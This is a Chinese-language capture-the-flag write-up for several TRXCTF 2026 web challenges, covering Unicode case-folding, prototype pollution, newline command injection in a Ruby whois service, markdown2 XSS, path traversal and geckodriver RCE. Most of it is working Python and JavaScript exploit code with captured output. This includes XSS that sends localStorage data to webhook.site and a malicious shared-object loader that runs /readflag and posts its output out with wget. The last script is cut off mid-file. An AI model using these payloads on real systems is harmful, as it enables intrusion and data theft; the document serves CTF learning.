TRX2026

借用n1的wp

StifflingFluffiness

源码里 admin 判断是:

req.session.isAdmin=username.toUpperCase()===ADMIN_USERNAME.toUpperCase();

但用户名限制是:

username.length>=4&&username.length<=12

真正 admin 是:

StifflingFluffiness

长度 19,正常输入不可能通过长度限制。但 JavaScript 的 toUpperCase() 会把某些 Unicode 连字展开成多个 ASCII 字母,例如:

st  -> ST
ffl  -> FFL
fl  -> FL
ffi  -> FFI
ß  -> SS

所以可以构造 12 长度的用户名:

stifflingfluffineß

TRX{m4yb3_my_fluffy_bl0g_n33d3d_b3773r_s3curi7y}

Junkiness

服务端使用 express.urlencoded({ extended: true }) 解析表单,请求体里的嵌套字段会被解析成数组或对象。注册接口只限制了 username 的长度和字符:

if (username.length > 8) {
    return res.status(400).json({ message: "Username must not be longer than 8 characters." });
}

if (/\\\\W/.test(username)) {
    return res.status(400).json({ message: "Username must be an alphanumeric string." });
}

users[username] = { username, password, isAdmin: false };

username[]=__proto__ 被解析成数组 ["__proto__"]。数组长度为 1,正则检查时会转成字符串 __proto__,可以通过过滤。写入 users[username] 时,数组作为属性名转成字符串,于是变成对 users["__proto__"] 赋值,修改了 users 对象的原型。

注册时把 password 构造成对象:

username[]=__proto__&password[password]=p&password[isAdmin]=true

注册完成后,users 的原型里存在:

{
  username: ["__proto__"],
  password: {
    password: "p",
    isAdmin: "true"
  },
  isAdmin: false
}

登录接口会执行:

const user = users[username];

if (user.password !== password) {
    return res.status(401).json({ message: "Invalid password." });
}

req.session.user = user;

使用 username=password&password=p 登录时,users["password"] 会从原型上取到对象 { password: "p", isAdmin: "true" }。密码校验通过后,这个对象被写入 session。访问 /flag 时,req.session.user.isAdmin 为真值,服务端返回 flag。

exp

#!/usr/bin/env python3
import http.cookiejar
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

def request(opener, method, url, body=None, content_type=None):
    data = None
    headers = {}
    if body is not None:
        data = body.encode()
        headers["Content-Type"] = content_type or "application/x-www-form-urlencoded"

    req = urllib.request.Request(url, data=data, headers=headers, method=method)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()

def main():
    base = sys.argv[1] if len(sys.argv) > 1 else "<http://127.0.0.1:3000>"
    base = base.rstrip("/")

    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    register_body = "username[]=__proto__&password[password]=p&password[isAdmin]=true"
    status, text = request(opener, "POST", base + "/register", register_body)
    print(f"[+] register: {status} {text}")
    if status not in (200, 201, 409):
        raise SystemExit("registration step failed")

    login_body = urllib.parse.urlencode({"username": "password", "password": "p"})
    status, text = request(opener, "POST", base + "/login", login_body)
    print(f"[+] login: {status} {text}")
    if status != 200:
        raise SystemExit("login step failed")

    status, text = request(opener, "GET", base + "/flag")
    print(f"[+] flag: {status} {text}")
    if status != 200:
        raise SystemExit("flag request failed")

    try:
        value = json.loads(text)
        if isinstance(value, dict):
            value = value.get("flag", value)
        print(value)
    except json.JSONDecodeError:
        print(text)

if __name__ == "__main__":
    main()
 
#[+] register: 201 {"message":"User registered successfully."}

#[+] login: 200 {"message":"Login successful."}

#[+] flag: 200 "TRX{j4v4scrip7_c4n_b3_j4nky_s0m37im3s}"

Who Is He

应用是一个 Sinatra 的 Whois 查询服务,核心逻辑如下:

post '/lookup' do
  @domain = params[:domain]
  if @domain && @domain.match?(/^[a-z.-]+$/)
    stdout, stderr, status = Open3.capture3("whois #{@domain}")
    @result = stdout.empty? ? stderr : stdout
    @success = status.success?
  else
    @error = "Invalid domain format"
  end
  erb :result
end

过滤规则看起来只允许小写字母、点和横线,但 Ruby 正则里的 ^$ 是按行匹配的锚点。只要参数中存在一行满足 ^[a-z.-]+$match? 就会返回真。这样就可以把第一行伪装成合法内容,随后通过换行继续注入 shell 命令。

镜像中还有一个 setuid 程序用于读取 flag,它要求传入固定参数:

strcmp(argv[1], "could you please give me the flag thank you so much")

为了让第一条命令稳定快速结束,可以让合法行使用 --version,它会被拼成 whois --version。换行后的第二条命令执行读 flag 程序:

--version
/readflag "could you please give me the flag thank you so much"

发送到接口时,表单字段 domain 使用上面的换行载荷。服务端正则会匹配第一行 --version,随后 Open3.capture3("whois #{payload}") 以命令字符串方式执行,shell 会依次执行 whois --version/readflag "could you please give me the flag thank you so much"

exp

#!/usr/bin/env python3
import argparse
import html
import re
import sys
import urllib.parse
import urllib.request

PAYLOAD = '--version\\\\n/readflag "could you please give me the flag thank you so much"'

def exploit(base_url: str) -> str:
    base_url = base_url.rstrip("/")
    data = urllib.parse.urlencode({"domain": PAYLOAD}).encode()
    request = urllib.request.Request(
        f"{base_url}/lookup",
        data=data,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )

    with urllib.request.urlopen(request, timeout=10) as response:
        body = response.read().decode("utf-8", errors="replace")

    body = html.unescape(body)
    match = re.search(r"TRX\\\\{[^}\\\\r\\\\n]+\\\\}", body)
    if not match:
        raise RuntimeError("flag not found in response:\\\\n" + body)
    return match.group(0)

def main() -> int:
    parser = argparse.ArgumentParser(description="Exploit WHOISHE command injection")
    parser.add_argument("url", nargs="?", default="<http://127.0.0.1:1337>")
    args = parser.parse_args()

    print(exploit(args.url))
    return 0

if __name__ == "__main__":
    sys.exit(main())

TRX{wh4t_d03s_h3_d0????}

markdown2

题目会让 bot 先访问 http://localhost:1337,把 Flag 写入这个源的 localStorage.flag,随后访问提交给 /report 的 URL。利用目标是在 http://localhost:1337 页面中执行脚本,读取 localStorage.flag 并跳转到回收地址。

服务端渲染逻辑为:

safe_md = bleach.clean(
    md,
    tags=[],
    attributes={},
    protocols=[],
    strip=True,
    strip_comments=True,
)

html = Markup(markdown2.markdown(safe_md, safe_mode="escape"))

输入先经过 bleach,之后再交给 markdown2 转成 HTML。bleach 只能处理输入里已经存在的 HTML 标签,Markdown 语法生成的新标签由 markdown2 自己负责安全处理。

markdown2 在 safe mode 中会用形如 md5-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 的占位符临时保护代码片段、URL 等内容。这个 hash 使用进程级随机盐生成,同一个进程内相同内容的 hash 保持稳定。图片 alt 中的代码片段可以泄露这个内部 hash:

![`" onerror=location=String.fromCharCode(...)+encodeURIComponent(localStorage.flag)//`](x)

返回 HTML 中会出现类似内容:

<img src="x" alt="&lt;code&gt;md5-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&lt;/code&gt;" />

拿到 hash 后,第二次请求把图片放在前面,把相同代码片段放在后面:

![](md5-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)

`" onerror=location=String.fromCharCode(...)+encodeURIComponent(localStorage.flag)//`

图片 URL 先被当作普通字符串处理。后面的代码片段再把相同 hash 加入 markdown2 的代码表。最终反解占位符时,图片的 src 值会被还原成原始代码片段,生成真实的事件属性:

<img src="" onerror=location=String.fromCharCode(...)+encodeURIComponent(localStorage.flag)//" alt="" />

页面 CSP 中 default-src 'none' 会阻止图片加载,浏览器触发 error 事件;script-src 'self' 'unsafe-inline' 允许内联事件执行,于是 onerror 可以读取 localStorage.flag 并跳转到回收地址。

远程利用时,第一阶段 hash 泄露可以访问公网题目域名。第二阶段提交给 /report 的 URL 必须使用 bot 容器内的同源地址:

<http://localhost:1337/?markdown=><第二阶段 payload>

exp:

import argparse
import re
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import quote

import requests

captured = []

class Collector(BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):
        return

    def do_GET(self):
        captured.append(self.path)
        self.send_response(204)
        self.end_headers()

def normalize_base(url: str) -> str:
    return url.rstrip("/") + "/"

def js_for_callback(callback_prefix: str) -> str:
    codes = ",".join(str(ord(ch)) for ch in callback_prefix)
    return (
        f"location=String.fromCharCode({codes})+"
        "encodeURIComponent(localStorage.flag)//"
    )

def make_code(callback_prefix: str) -> str:
    return '" onerror=' + js_for_callback(callback_prefix)

def make_leak_payload(callback_prefix: str) -> str:
    code = make_code(callback_prefix)
    return f"![`{code}`](x)"

def make_exploit_payload(leaked_hash: str, callback_prefix: str) -> str:
    code = make_code(callback_prefix)
    return f"![]({leaked_hash})\\n\\n`{code}`"

def leak_hash(target: str, callback_prefix: str) -> str:
    base = normalize_base(target)
    payload = make_leak_payload(callback_prefix)
    resp = requests.get(base + "?markdown=" + quote(payload, safe=""), timeout=15)
    resp.raise_for_status()
    match = re.search(r"md5-[0-9a-f]{32}", resp.text)
    if not match:
        raise RuntimeError("failed to leak markdown2 hash")
    return match.group(0)

def submit_report(target: str, victim_base: str, payload: str) -> str:
    report_url = normalize_base(target) + "report"
    victim_url = normalize_base(victim_base) + "?markdown=" + quote(payload, safe="")
    resp = requests.post(report_url, data={"url": victim_url}, timeout=15)
    resp.raise_for_status()
    print(f"[+] victim url: {victim_url}")
    print(f"[+] report response: {resp.text}")
    return victim_url

def create_webhook_site_token() -> str:
    resp = requests.post("<https://webhook.site/token>", timeout=15)
    resp.raise_for_status()
    return resp.json()["uuid"]

def poll_webhook_site(token: str, timeout: int) -> str | None:
    api = f"<https://webhook.site/token/{token}/requests>"
    deadline = time.time() + timeout
    while time.time() < deadline:
        time.sleep(1)
        resp = requests.get(api, timeout=15)
        resp.raise_for_status()
        data = resp.json().get("data", [])
        for item in data:
            query = item.get("query") or {}
            if "flag" in query:
                return query["flag"]
            url = item.get("url") or ""
            if "flag=" in url:
                return url.split("flag=", 1)[1]
    return None

def main() -> None:
    parser = argparse.ArgumentParser(description="TRXCTF markdown2 exploit")
    parser.add_argument("target", help="public challenge base URL")
    parser.add_argument(
        "--victim-base",
        default="<http://localhost:1337>",
        help="URL visited by the bot; keep localhost for the remote challenge",
    )
    parser.add_argument("--callback", help="public callback prefix ending before the flag")
    parser.add_argument("--webhook-site", action="store_true", help="create and poll a webhook.site callback")
    parser.add_argument("--listen", action="store_true", help="start a local collector for local testing")
    parser.add_argument("--listen-host", default="0.0.0.0")
    parser.add_argument("--listen-port", type=int, default=8000)
    parser.add_argument("--timeout", type=int, default=20)
    args = parser.parse_args()

    server = None
    token = None

    if args.webhook_site:
        token = create_webhook_site_token()
        callback = f"<https://webhook.site/{token}/?flag=>"
        print(f"[+] webhook: {callback}")
    elif args.callback:
        callback = args.callback
    elif args.listen:
        callback = f"<http://127.0.0.1>:{args.listen_port}/collect?flag="
    else:
        raise SystemExit("provide --webhook-site, --callback, or --listen")

    if args.listen:
        server = ThreadingHTTPServer((args.listen_host, args.listen_port), Collector)
        threading.Thread(target=server.serve_forever, daemon=True).start()

    leaked = leak_hash(args.target, callback)
    print(f"[+] leaked hash: {leaked}")

    payload = make_exploit_payload(leaked, callback)
    submit_report(args.target, args.victim_base, payload)

    if token:
        flag = poll_webhook_site(token, args.timeout)
        print(f"[+] flag: {flag}" if flag else "[-] no webhook callback received")

    if args.listen:
        deadline = time.time() + args.timeout
        while time.time() < deadline and not captured:
            time.sleep(0.2)
        print(f"[+] callback: {captured[0]}" if captured else "[-] no local callback received")
        server.shutdown()

if __name__ == "__main__":
    main()

# Active code page: 65001
# [+] webhook: <https://webhook.site/b947bedb-4273-4f16-ae0c-d19aacb8207b/?flag=>
# [+] leaked hash: md5-3aaa0de9027a6884f27e62b5cc2346a3
# [+] victim url: <http://localhost:1337/?markdown=%21%5B%5D%28md5-3aaa0de9027a6884f27e62b5cc2346a3%29%0A%0A%60%22%20onerror%3Dlocation%3DString.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C101%2C98%2C104%2C111%2C111%2C107%2C46%2C115%2C105%2C116%2C101%2C47%2C98%2C57%2C52%2C55%2C98%2C101%2C100%2C98%2C45%2C52%2C50%2C55%2C51%2C45%2C52%2C102%2C49%2C54%2C45%2C97%2C101%2C48%2C99%2C45%2C100%2C49%2C57%2C97%2C97%2C99%2C98%2C56%2C50%2C48%2C55%2C98%2C47%2C63%2C102%2C108%2C97%2C103%2C61%29%2BencodeURIComponent%28localStorage.flag%29%2F%2F%60>
# [+] report response: {"result":"Visiting..."}

# [+] flag: TRX{n0t_s0_s4f3_m0d3_dwiudwahyudyusaidwqjn}
# [+] webhook: <https://webhook.site/b947bedb-4273-4f16-ae0c-d19aacb8207b/?flag=>
# [+] leaked hash: md5-3aaa0de9027a6884f27e62b5cc2346a3
# [+] victim url: <http://localhost:1337/?markdown=%21%5B%5D%28md5-3aaa0de9027a6884f27e62b5cc2346a3%29%0A%0A%60%22%20onerror%3Dlocation%3DString.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C101%2C98%2C104%2C111%2C111%2C107%2C46%2C115%2C105%2C116%2C101%2C47%2C98%2C57%2C52%2C55%2C98%2C101%2C100%2C98%2C45%2C52%2C50%2C55%2C51%2C45%2C52%2C102%2C49%2C54%2C45%2C97%2C101%2C48%2C99%2C45%2C100%2C49%2C57%2C97%2C97%2C99%2C98%2C56%2C50%2C48%2C55%2C98%2C47%2C63%2C102%2C108%2C97%2C103%2C61%29%2BencodeURIComponent%28localStorage.flag%29%2F%2F%60>
# [+] report response: {"result":"Visiting..."}

# [+] flag: TRX{n0t_s0_s4f3_m0d3_dwiudwahyudyusaidwqjn}

short-notes

服务端自己实现了一套查询字符串解析:

function parseQuery(qs = '') {
  const out = {};
  for (const pair of qs.split('&')) {
    if (!pair) continue;
    let [k, v = ''] = pair.split('=');
    k = decodeURIComponent(k.replace(/\\\\+/g, ' '));
    v = decodeURIComponent(v.replace(/\\\\+/g, ' '));
    const parts = k.split(/\\\\[|\\\\]/).filter(Boolean);
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      cur = cur[parts[i]] = cur[parts[i]] || {};
    }
    cur[parts.at(-1)] = v;
  }
  return out;
}

这段代码没有过滤 __proto__,可以把属性写进 Object.prototype

笔记标题只检查类型和长度,不过滤 ./

const validateTitle = t => {
  if (!t)
    throw new Error('Title required');
  if (typeof t !== 'string')
    throw new Error('Title must be a string');
  if (t.length > 8)
    throw new Error('Title too long (max 8 chars)');
  return t;
};

创建和读取笔记时都直接把标题拼到临时目录后面:

const file = t => path.join(STORE, t);

../../se 正好是 8 个字符,所以既能通过校验,又能从临时目录逃到根目录,最后落成 /se

读取笔记时会走 h.file(),底层是 @hapi/inert。如果 lookupCompressed 为真,lookupMap 里又存在当前编码对应的后缀,Inert 会把这个后缀直接拼到原始路径后面重新打开文件:

if (settings.lookupCompressed &&
    !settings.start &&
    settings.end === undefined &&
    request.server.settings.compression !== false) {

    const lookupMap = settings.lookupMap ?? internals.defaultMap;
    const encoding = request.info.acceptEncoding;
    const extension = lookupMap.hasOwnProperty(encoding) ? lookupMap[encoding] : null;
    if (extension) {
        const precompressed = new Fs.File(`${source.path}${extension}`);
        var stat = await precompressed.openStat('r');
        ...
    }
}

这里的关键点是 settings.lookupCompressedsettings.lookupMap 都会走原型链取值。于是可以先污染:

Object.prototype.lookupCompressed = 1
Object.prototype.lookupMap.identity = 'crets/super_secret_flag.txt'

这样当原始路径是 /se,并且请求头里带 Accept-Encoding: identity 时,Inert 最终会去打开:

/se + crets/super_secret_flag.txt
= /secrets/super_secret_flag.txt

利用步骤

  1. 先创建一个标题为 ../../se 的笔记,让服务端在根目录生成锚点文件 /se
  2. 通过查询字符串原型污染,把 lookupCompressedlookupMap.identity 写进 Object.prototype
  3. 请求 /note/%2E%2E%2F%2E%2E%2Fse,并指定 Accept-Encoding: identity,让 Inert 走到拼接后的真实 Flag 路径。

对应请求如下:

POST /notes HTTP/1.1
Content-Type: application/json

{"title":"../../se","content":"anchor"}
GET /?__proto__[lookupCompressed]=1&__proto__[lookupMap][identity]=crets%2Fsuper_secret_flag.txt HTTP/1.1
GET /note/%2E%2E%2F%2E%2E%2Fse HTTP/1.1
Accept-Encoding: identity

Exp

#!/usr/bin/env python3

import argparse
import sys

import requests

ANCHOR_TITLE = "../../se"
ANCHOR_CONTENT = "anchor"
ENCODED_ANCHOR = "%2E%2E%2F%2E%2E%2Fse"
POLLUTION_PATH = "/?__proto__[lookupCompressed]=1&__proto__[lookupMap][identity]=crets%2Fsuper_secret_flag.txt"

def fail(message: str) -> int:
    print(f"[!] {message}", file=sys.stderr)
    return 1

def main() -> int:
    parser = argparse.ArgumentParser(description="Exploit for TRXCTF Short Notes")
    parser.add_argument(
        "base_url",
        nargs="?",
        default="<http://66020310f456.short-notes.ctf.theromanxpl0.it>",
        help="Target base URL, for example <http://127.0.0.1:3000>",
    )
    args = parser.parse_args()
    base_url = args.base_url.rstrip("/")

    session = requests.Session()
    timeout = 10

    create = session.post(
        f"{base_url}/notes",
        json={"title": ANCHOR_TITLE, "content": ANCHOR_CONTENT},
        timeout=timeout,
    )
    if create.status_code not in (201, 409):
        return fail(f"anchor creation failed: {create.status_code} {create.text}")
    print(f"[+] anchor ready with status {create.status_code}")

    pollute = session.get(f"{base_url}{POLLUTION_PATH}", timeout=timeout)
    if pollute.status_code != 200:
        return fail(f"prototype pollution request failed: {pollute.status_code} {pollute.text}")
    print("[+] prototype polluted")

    leak = session.get(
        f"{base_url}/note/{ENCODED_ANCHOR}",
        headers={"Accept-Encoding": "identity"},
        timeout=timeout,
    )
    if leak.status_code != 200:
        return fail(f"flag read failed: {leak.status_code} {leak.text}")

    body = leak.text.strip()
    print("[+] response body:")
    print(body)
    return 0

if __name__ == "__main__":
    raise SystemExit(main())

# PS D:\\CTF\\2026 0425-0427 TRXCTF\\web-short-notes> & D:/Env/Python311/python.exe "d:/CTF/2026 0425-0427 TRXCTF/web-short-notes/result/Exp/exploit.py"                               
# [+] anchor ready with status 201                                                         
# [+] prototype polluted                                                                   
# [+] response body:                                                                       
# TRX{<https://www.youtube.com/watch?v=OWbtxdq5rvQ>}  

geckodrce

服务是一个 FastAPI bot,核心接口只有 POST /visit。用户上传 Firefox 扩展包后,服务把文件保存成临时 XPI,然后启动 headless Firefox,通过 geckodriver 临时安装该扩展。

@app.post("/visit")
async def visit(extension: UploadFile = File(...)):
    if not extension.filename:
        raise HTTPException(status_code=400, detail="No extension uploaded")

    with tempfile.TemporaryDirectory(prefix="bot_", dir="/tmp") as td:
        ext_path = Path(td) / "extension.xpi"
        await save_upload(extension, ext_path)
        await asyncio.to_thread(run_webdriver, str(ext_path))

    return {"status": "success"}

Firefox 启动参数里禁用了 Wasm 和 JIT,扩展安装后会停留 60 秒:

def run_webdriver(ext_path: str) -> None:
    opts = Options()
    opts.binary_location = "/usr/bin/firefox"
    opts.add_argument("-headless")
    opts.set_preference("javascript.options.wasm", False)
    opts.set_preference("javascript.options.baselinejit", False)
    opts.set_preference("javascript.options.ion", False)
    opts.set_preference("javascript.options.asmjs", False)

    service = Service(executable_path="/usr/bin/geckodriver")
    driver = webdriver.Firefox(options=opts, service=service)
    try:
        addon_id = driver.install_addon(ext_path, temporary=True)
        time.sleep(60)
        driver.uninstall_addon(addon_id)
    except Exception:
        pass
    finally:
        driver.quit()

容器中存在 SUID 程序 /readflag,只要以参数 pls 调用它,就会读取 /flag.txt

int main(int argc, char *argv[]) {
  if (argc != 2 || strcmp(argv[1], "pls") != 0) {
    write(1, "ask politely :(\\\\n", 16);
    return 1;
  }

  int fd = open("/flag.txt", O_RDONLY);
  if (fd < 0) return 1;

  char buf[128];
  ssize_t n = read(fd, buf, sizeof(buf));
  if (n > 0) write(1, buf, (size_t)n);

  close(fd);
  return 0;
}

因此目标变成:让上传的扩展在 bot 容器里触发本地命令执行,运行 /readflag pls 并把输出带出。

漏洞思路

Selenium 启动 Firefox 时会启动一个本地 geckodriver 服务,监听 127.0.0.1:<随机端口>。上传的扩展运行在同一个 Firefox 里,并且可以带 <all_urls> 权限访问本机 HTTP 服务。

访问 geckodriver 的 /status 可以识别端口:

{"value":{"message":"Session already started","ready":false}}

当前 Selenium session 结束后,geckodriver 会短暂进入可创建新 session 的状态。扩展持续向这个端口发送:

POST /session

即可抢先创建一个新的 Firefox session。

直接从扩展请求 geckodriver 会遇到 Origin 校验。Firefox WebExtension 可以用 webRequestBlocking 修改请求头,在请求发出前删除 Origin

browser.webRequest.onBeforeSendHeaders.addListener(
  details => ({
    requestHeaders: details.requestHeaders.filter(
      h => h.name.toLowerCase() !== "origin"
    )
  }),
  {urls: ["<http://127.0.0.1/*>", "<http://localhost/*>"]},
  ["blocking", "requestHeaders"]
);

新建 session 时可以传入 Firefox profile。profile 中的 pkcs11.txt 能指定 NSS 需要加载的 PKCS#11 模块:

library=
name=NSS Internal PKCS #11 Module
parameters=configdir='sql:.' certPrefix='' keyPrefix='' secmod='secmod.db' flags=readOnly
NSS=trustOrder=75 cipherOrder=100

library=/home/bot/Downloads/pwn.so
name=geckodrce
parameters=
NSS=trustOrder=100 cipherOrder=100

扩展先把自带的 pwn.so 下载到默认下载目录:

await browser.downloads.download({
  url: browser.runtime.getURL("pwn.so"),
  filename: "pwn.so",
  conflictAction: "overwrite",
  saveAs: false
});

然后创建带恶意 profile 的新 session:

const payload = JSON.stringify({
  capabilities: {
    alwaysMatch: {
      browserName: "firefox",
      "moz:firefoxOptions": {
        binary: "/usr/bin/firefox",
        args: ["-headless"],
        profile: PROFILE_B64
      }
    }
  }
});

fetch(`http://127.0.0.1:${port}/session`, {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: payload
});

Firefox 启动时读取 pkcs11.txt,NSS 加载 /home/bot/Downloads/pwn.so,动态库 constructor 自动执行:

__attribute__((constructor)) static void geckodrce_init(void) {
    if (getenv("GECKODRCE_DONE") != NULL) return;
    setenv("GECKODRCE_DONE", "1", 1);

    pid_t pid = fork();
    if (pid != 0) return;

    setsid();
    execl("/bin/sh", "sh", "-c",
          "flag=/tmp/geckodrce_flag; "
          "/readflag pls > \\\\"$flag\\\\" 2>/tmp/geckodrce_err; "
          "wget -q -O- --post-file=\\\\"$flag\\\\" CALLBACK >/dev/null 2>&1",
          (char *)0);
    _exit(0);
}

Race 方式

/visit 中原始 Selenium session 会占用 geckodriver,大约 60 秒后才释放。单个扩展很难稳定抢到自己的 geckodriver,因此使用多分片、多波次上传。

端口分片:

30000-38750
38751-47500
47501-56250
56251-65000

每个 XPI 扫描一段端口,发现 /status 命中后持续对该端口发送 /session。第一波上传负责制造可抢占的 geckodriver,第二波延迟约 20 秒上传,在第一波接近退出时已经完成扫描并开始抢占。抢到 session 后,带 pkcs11.txt 的 Firefox profile 会加载恶意 .so,执行 /readflag pls,再把 flag 发到回连地址。

exp:

#!/usr/bin/env python3
import argparse
import base64
import http.server
import io
import json
import os
import queue
import re
import shutil
import socketserver
import subprocess
import sys
import tempfile
import threading
import time
import urllib.parse
import urllib.request
import uuid
import zipfile
from pathlib import Path

DEFAULT_TARGET = "<http://e5653b6f1fe2.geckodrce.ctf.theromanxpl0.it>"
DEFAULT_SHARDS = "30000-38750,38751-47500,47501-56250,56251-65000"
DOWNLOAD_PATH = "/home/bot/Downloads/pwn.so"
MAX_XPI_SIZE = 1024 * 1024
FLAG_RE = re.compile(r"TRX\\{[^}\\r\\n]*\\}")

PWN_C_TEMPLATE = r"""
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) static void geckodrce_init(void) {
    if (getenv("GECKODRCE_DONE") != NULL) {
        return;
    }
    setenv("GECKODRCE_DONE", "1", 1);

    pid_t pid = fork();
    if (pid != 0) {
        return;
    }

    setsid();
    execl("/bin/sh", "sh", "-c", __COMMAND_LITERAL__, (char *)0);
    _exit(0);
}
"""

BACKGROUND_JS = r"""
const LO = __LO__;
const HI = __HI__;
const CONCURRENCY = __CONCURRENCY__;
const CALLBACK_URL = __CALLBACK_URL__;
const PROFILE_B64 = __PROFILE_B64__;

const payload = JSON.stringify({
  capabilities: {
    alwaysMatch: {
      browserName: "firefox",
      "moz:firefoxOptions": {
        binary: "/usr/bin/firefox",
        args: ["-headless"],
        profile: PROFILE_B64
      }
    }
  }
});

const candidates = new Set();
const watching = new Set();

function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}

async function report(kind, data) {
  if (!CALLBACK_URL) return;
  const body = JSON.stringify({kind, data, shard: [LO, HI], when: Date.now()});
  try {
    await fetch(CALLBACK_URL, {
      method: "POST",
      headers: {"Content-Type": "application/json"},
      body
    });
  } catch (e) {
    try {
      await fetch(CALLBACK_URL + "?d=" + encodeURIComponent(body), {
        mode: "no-cors",
        cache: "no-store"
      });
    } catch (_) {}
  }
}

browser.webRequest.onBeforeSendHeaders.addListener(
  details => {
    const headers = (details.requestHeaders || []).filter(
      h => h.name.toLowerCase() !== "origin"
    );
    return {requestHeaders: headers};
  },
  {
    urls: [
      "<http://127.0.0.1/*>",
      "<http://localhost/*>"
    ]
  },
  ["blocking", "requestHeaders"]
);

async function downloadSharedObject() {
  return new Promise(resolve => {
    let downloadId = null;
    let done = false;

    function finish(value) {
      if (done) return;
      done = true;
      try { browser.downloads.onChanged.removeListener(onChanged); } catch (_) {}
      resolve(value);
    }

    function onChanged(delta) {
      if (downloadId === null || delta.id !== downloadId) return;
      if (delta.state && delta.state.current === "complete") finish(true);
      if (delta.error) finish(false);
    }

    browser.downloads.onChanged.addListener(onChanged);
    browser.downloads.download({
      url: browser.runtime.getURL("pwn.so"),
      filename: "pwn.so",
      conflictAction: "overwrite",
      saveAs: false
    }).then(id => {
      downloadId = id;
    }).catch(async e => {
      await report("download-error", String(e && (e.message || e)));
      finish(false);
    });

    setTimeout(() => finish(true), 5000);
  });
}

async function fetchWithTimeout(url, options, timeoutMs) {
  const controller = new AbortController();
  const timer = setTimeout(() => controller.abort(), timeoutMs);
  try {
    const merged = Object.assign({}, options || {}, {signal: controller.signal});
    return await fetch(url, merged);
  } finally {
    clearTimeout(timer);
  }
}

async function probePort(port) {
  try {
    const r = await fetchWithTimeout(
      "<http://127.0.0.1>:" + port + "/status",
      {cache: "no-store"},
      350
    );
    const text = await r.text();
    if (text.includes('"ready"') || text.includes("Session already started")) {
      if (!candidates.has(port)) {
        candidates.add(port);
        await report("candidate", {port, status: text.slice(0, 200)});
      }
      watchPort(port);
      return true;
    }
  } catch (_) {}
  return false;
}

async function createSession(port) {
  try {
    const r = await fetchWithTimeout(
      "<http://127.0.0.1>:" + port + "/session",
      {
        method: "POST",
        cache: "no-store",
        headers: {"Content-Type": "application/json"},
        body: payload
      },
      5000
    );
    const text = await r.text();
    if (text.includes("sessionId") || text.includes('"sessionId"')) {
      await report("session-created", {port, response: text.slice(0, 500)});
      return true;
    }
  } catch (_) {}
  return false;
}

function watchPort(port) {
  if (watching.has(port)) return;
  watching.add(port);

  (async () => {
    const deadline = Date.now() + 125000;
    while (Date.now() < deadline) {
      await createSession(port);
      await sleep(70 + Math.floor(Math.random() * 80));
    }
  })();
}

async function scanRange() {
  let next = LO;
  async function worker() {
    while (true) {
      const port = next++;
      if (port > HI) return;
      await probePort(port);
    }
  }
  await Promise.all(Array.from({length: CONCURRENCY}, () => worker()));
}

(async () => {
  await report("started", {lo: LO, hi: HI});
  const downloaded = await downloadSharedObject();
  await report("downloaded-so", {ok: downloaded});
  await scanRange();
  await report("scan-finished", {candidateCount: candidates.size, candidates: Array.from(candidates)});

  while (true) {
    for (const port of Array.from(candidates)) {
      createSession(port);
    }
    await sleep(250);
  }
})();
"""

class ReusableTCPServer(socketserver.TCPServer):
    allow_reuse_address = True

class CallbackHandler(http.server.BaseHTTPRequestHandler):
    inbox = None

    def _ok(self, body=b"ok\\n"):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        parsed = urllib.parse.urlsplit(self.path)
        data = urllib.parse.parse_qs(parsed.query).get("d", [""])[0]
        if data:
            self.inbox.put(data)
        self._ok()

    def do_POST(self):
        n = int(self.headers.get("Content-Length", "0") or "0")
        raw = self.rfile.read(n)
        text = raw.decode(errors="replace")
        self.inbox.put(text)
        self._ok()

    def log_message(self, fmt, *args):
        sys.stderr.write("[callback] " + (fmt % args) + "\\n")

def shell_quote(value: str) -> str:
    return "'" + value.replace("'", "'\\"'\\"'") + "'"

def c_string(value: str) -> str:
    return json.dumps(value)

def make_command(callback_url: str) -> str:
    quoted = shell_quote(callback_url)
    return (
        "flag=/tmp/geckodrce_flag; "
        "/readflag pls > \\"$flag\\" 2>/tmp/geckodrce_err; "
        "(wget -q -O- --post-file=\\"$flag\\" {url} || "
        "busybox wget -q -O- --post-file=\\"$flag\\" {url}) "
        ">/dev/null 2>&1"
    ).format(url=quoted)

def write_payload_source(path: Path, callback_url: str) -> None:
    command = make_command(callback_url)
    source = PWN_C_TEMPLATE.replace("__COMMAND_LITERAL__", c_string(command))
    path.write_text(source, encoding="utf-8")

def run_checked(cmd, cwd: Path) -> None:
    print("[*]", " ".join(str(x) for x in cmd))
    subprocess.run(cmd, cwd=str(cwd), check=True)

def compile_shared_object(workdir: Path, c_path: Path, so_path: Path) -> None:
    if os.name != "nt" and shutil.which("gcc"):
        cmd = ["gcc", "-shared", "-fPIC", "-Os", str(c_path), "-o", str(so_path)]
        run_checked(cmd, workdir)
        if shutil.which("strip"):
            subprocess.run(["strip", str(so_path)], cwd=str(workdir), check=False)
        return

    if shutil.which("docker"):
        volume = f"{workdir.resolve()}:/work"
        script = (
            "apk add --no-cache build-base >/dev/null && "
            "gcc -shared -fPIC -Os /work/pwn.c -o /work/pwn.so && "
            "strip /work/pwn.so"
        )
        run_checked(
            ["docker", "run", "--rm", "-v", volume, "-w", "/work", "alpine:3.23", "/bin/sh", "-lc", script],
            workdir,
        )
        return

    raise RuntimeError("no Linux gcc or docker found; pass --so with a musl-compatible shared object")

def make_profile_b64() -> str:
    pkcs11 = f"""library=
name=NSS Internal PKCS #11 Module
